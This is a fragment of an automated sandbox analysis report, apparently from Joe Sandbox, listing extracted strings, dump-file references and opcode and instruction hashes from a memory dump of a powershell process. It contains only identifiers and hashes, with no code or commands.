                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4'kq$4'kq$XY!l$XY!l
                                                                                                                                                                  • API String ID: 0-1470764183
                                                                                                                                                                  • Opcode ID: 19c51fbb8d05181304865648c661ca51ec116ce26c2b01896551799003ec1bc3
                                                                                                                                                                  • Instruction ID: a66b036f2bf43e4e30e8b17b531de5274224da303b33440a11bb50fc1c79c7db
                                                                                                                                                                  • Opcode Fuzzy Hash: 19c51fbb8d05181304865648c661ca51ec116ce26c2b01896551799003ec1bc3
                                                                                                                                                                  • Instruction Fuzzy Hash: 014116B5B0420E8FCB649B28D4007ABB7E2AFC5224F24867ADD19DB355D732CD41CBA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2494159199.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7050000_powershell.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $kq$$kq$$kq$$kq
                                                                                                                                                                  • API String ID: 0-2881790790
                                                                                                                                                                  • Opcode ID: 47f69269eb77f835ca1321d593a79a4de6807e400dc817e64713abd5a8b4ad1f
                                                                                                                                                                  • Instruction ID: c5067bacb1927eace765c9eb0281c8b882de2bb5c48047935e7fbe7e66687774
                                                                                                                                                                  • Opcode Fuzzy Hash: 47f69269eb77f835ca1321d593a79a4de6807e400dc817e64713abd5a8b4ad1f
                                                                                                                                                                  • Instruction Fuzzy Hash: 442135F13103465BDB7895698801B27AEDABFD4315F24C92AAD09CB382DD39D841C361